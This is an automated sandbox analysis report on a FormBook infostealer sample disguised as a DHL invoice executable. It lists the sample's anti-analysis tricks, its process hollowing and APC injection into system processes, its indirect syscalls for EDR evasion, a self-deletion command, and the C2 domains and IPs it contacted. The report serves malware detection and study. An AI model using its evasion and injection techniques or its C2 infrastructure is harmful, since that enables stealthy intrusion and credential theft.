Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0125F98E
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_012D1C41

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	API/Special instruction interceptor: Address: 1B3204
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731C25A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C1DA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BFBA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BFDA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C25A

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 89B6E second address: 89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4248	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5576	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 1595	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 1022	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 8948	Jump to behavior

Found decision node followed by non-executed suspicious APIs

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\cscript.exe	API coverage: 4.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 1964	Thread sleep time: -8496000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1340	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1964	Thread sleep time: -11152000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep count: 1022 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep time: -2044000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep count: 8948 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep time: -17896000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127C2A2 FindFirstFileExW,	0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B68EE FindFirstFileW,FindClose,	0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,	4_2_0035F0D3

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Source: explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000003.00000002.869194618.0000000003DDA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000003.00000000.349305261.00000000025E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BEAA2 BlockInput,

0_2_012BEAA2

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_01272622

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01264CE8 mov eax, dword ptr fs:[00000030h]	0_2_01264CE8
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B3470 mov eax, dword ptr fs:[00000030h]	0_2_001B3470
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B34D0 mov eax, dword ptr fs:[00000030h]	0_2_001B34D0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B1E70 mov eax, dword ptr fs:[00000030h]	0_2_001B1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007200EA mov eax, dword ptr fs:[00000030h]	2_2_007200EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00720080 mov ecx, dword ptr fs:[00000030h]	2_2_00720080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007426F8 mov eax, dword ptr fs:[00000030h]	2_2_007426F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02080080 mov ecx, dword ptr fs:[00000030h]	4_2_02080080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020800EA mov eax, dword ptr fs:[00000030h]	4_2_020800EA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A26F8 mov eax, dword ptr fs:[00000030h]	4_2_020A26F8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_012A0B62

Enables debug privileges

Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012609D5 SetUnhandledExceptionFilter,	0_2_012609D5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01272622
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0126083F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01260C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_01260C21
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00351335 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00351335

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 192.185.209.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 65.21.196.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe	Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe	Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe	Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ilovetvs.com

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\cscript.exe	NtUnmapViewOfSection: Indirect: 0x5B9DB9	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	NtClose: Indirect: 0x5B9DC5
Source: C:\Windows\SysWOW64\cscript.exe	NtQueueApcThread: Indirect: 0x5BA531	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	NtMapViewOfSection: Indirect: 0x5B9D47	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	NtClose: Indirect: 0x38A56C
Source: C:\Windows\SysWOW64\svchost.exe	NtQueueApcThread: Indirect: 0x38A4F2	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 1244			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 1244			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 350000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008

Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A1201

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01282BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_01282BA5

Contains functionality to simulate keystroke presses

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AB226 SendInput,keybd_event,

0_2_012AB226

Contains functionality to simulate mouse events

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AE355 mouse_event,

0_2_012AE355

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A0B62

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_012A1663

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman-
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01260698 cpuid

0_2_01260698

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetUserDefaultLCID,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,lstrlenA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,		4_2_00353030
Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetLocaleInfoW,wcsncmp,		4_2_003641BC

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0127333F GetSystemTimeAsFileTime,

0_2_0127333F

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0129D27A GetUserNameW,

0_2_0129D27A

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0127B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0127B952

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

OS version to string mapping found (often used in BOTs)

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_81
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_XP
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_XPe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_VISTA
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_7
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
